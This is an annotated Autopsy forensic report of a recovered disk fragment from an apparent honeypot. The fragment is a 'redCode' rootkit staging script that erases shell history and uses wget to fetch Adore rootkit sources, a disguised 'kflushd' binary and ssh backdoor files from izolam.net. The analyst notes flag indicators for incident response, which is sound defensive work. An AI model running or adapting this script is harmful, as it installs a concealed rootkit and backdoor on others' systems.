Autopsy ascii Fragment Report (ver 1.74)
--------------------------------------------------------------
Fragment: 36691
Length: 4096 bytes
Not allocated to any meta data structures
MD5 of raw Fragment: 8565944537c4d50fbe648a270495d26b
MD5 of ascii output: 8f14c95153c199b9543d508c9d9c0bc6
Image: /home/kmaster/tools/filesystem/evidence//SOTM29/192.168.1.79/images/root_honeypot
Image Type: linux-ext3
Date Generated: Sat Sep 20 19:00:38 2003
Investigator: CGR
--------------------------------------------------------------
# [analyst note] Lines beginning with '#' are reviewer annotations and are NOT
# part of the recovered fragment. The MD5 values in the header refer to the raw
# fragment and to Autopsy's ascii output, not to this annotated rendering.
# The recovered text is a shell script that stages files on the host; what
# follows only downloads files. Nothing in this part compiles or runs them.

# [analyst note] Unsets the shell history variables. Unsetting HISTFILE stops
# the shell from writing the session's commands to a history file, so the
# absence of history for this session is itself consistent with this script.
unset HISTFILE HISTSIZE HISTSAVE

# [analyst note] ANSI colour escape sequences; used only by the printf status
# messages below and have no effect on what is written to disk.
BLK="\033[0;30m"
RED="\033[0;31m"
GRN="\033[0;32m"
YEL="\033[0;33m"
BLU="\033[0;34m"
MAG="\033[0;35m"
CYN="\033[0;36m"
WHI="\033[0;37m"
DRED="\033[1;31m"
DGRN="\033[1;32m"
DYEL="\033[1;33m"
DBLU="\033[1;34m"
DMAG="\033[1;35m"
DCYN="\033[1;36m"
DWHI="\033[1;37m"
BW="\033[47;1;30m"
YBL="\033[44;1;33m"
RES="\033[0m"

# [analyst note] Banner. The kit names itself "redCode"; the second line
# appears to be Romanian. Treat that as a low-confidence attribution hint only.
printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n"
printf "${YBL}redCode${RES}${YBL}Face Treaba${RES}${YBL}ushoara${RES}\n"

# [analyst note] Staging directory. /tmp/rk is a host-side indicator to look
# for in the image (directory entries, deleted inodes, timeline around its
# creation time).
printf "${DCYN}Creating Directory...${RES}\n"
mkdir /tmp/rk
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk
printf "${DCYN}OK${RES}\n"

# [analyst note] Two files fetched from izolam.net with wget in quiet mode
# (-q suppresses wget's own output). Their contents are not in this fragment.
# "kflushd" is also the name of a kernel thread on older Linux kernels, so the
# name was presumably chosen to blend into process listings; confirm against
# the recovered binary. The domain is a network indicator for proxy, DNS and
# firewall log review.
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/inst -q
wget izolam.net/rc/kflushd -q
printf "${DCYN}OK${RES}\n"

# [analyst note] Second staging directory, /tmp/rk/adore.
printf "${DCYN}Creating Directory...${RES}\n"
sleep 1
mkdir /tmp/rk/adore
printf "${DCYN}Entering Directory${RES}\n"
cd /tmp/rk/adore/
printf "${DCYN}OK${RES}\n"

# [analyst note] C sources and a header are downloaded rather than a prebuilt
# binary. The file names match the source tree of the publicly documented
# Adore loadable-kernel-module rootkit; the contents are not visible here, so
# verify against the recovered files. Since sources and a Makefile are pulled
# down, a build step on the host is likely; check for compiler activity and
# for kernel-module loading in the timeline.
printf "${DCYN}getting the files...${RES}\n"
wget izolam.net/rc/adore/adore.c -q
wget izolam.net/rc/adore/ava.c -q
wget izolam.net/rc/adore/dummy.c -q
wget izolam.net/rc/adore/exec.c -q
wget izolam.net/rc/adore/exec-test.c -q
wget izolam.net/rc/adore/libinvisible.c -q
wget izolam.net/rc/adore/libinvisible.h -q
wget izolam.net/rc/adore/cleaner.c -q
sleep 4
printf "${DCYN}OK${RES}\n"
printf "${DCYN}getting the Makefile${RES}\n"
wget izolam.net/rc/adore/Makefile -q
printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n"

# [analyst note] Status message only; no directory change is issued here.
printf "${DCYN}Leaving directory..${RES}\n"
printf "${DCYN}Creating Directory...${RES}\n" mkdir /tmp/rk/ssh printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" cd /tmp/rk/ssh printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/ssh/sp0 -q wget izolam.net/rc/ssh/sp0_cfg -q wget izolam.net/rc/ssh/sp0_key -q wget izolam.net/rc/ssh/sp0_seed -q sleep 2 printf "${DCYN}Changing the file modes..${RES}\n" chmod 777 sp0 printf "${DCYN}OK${RES}\n" printf "${DCYN}Leaving directory..${RES}\n" cd /tmp/rk/ chmod 777 inst kflushd sleep 1 printf "${DCYN}OK${RES}\n" printf "${DCYN}Cleaning...${RES}\n" printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" printf "${DCYN}All done...${RES}\n" printf "${DCYN}You Got The redCode rk${RES} ${YEL}$IP${RES}\n" printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n" .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................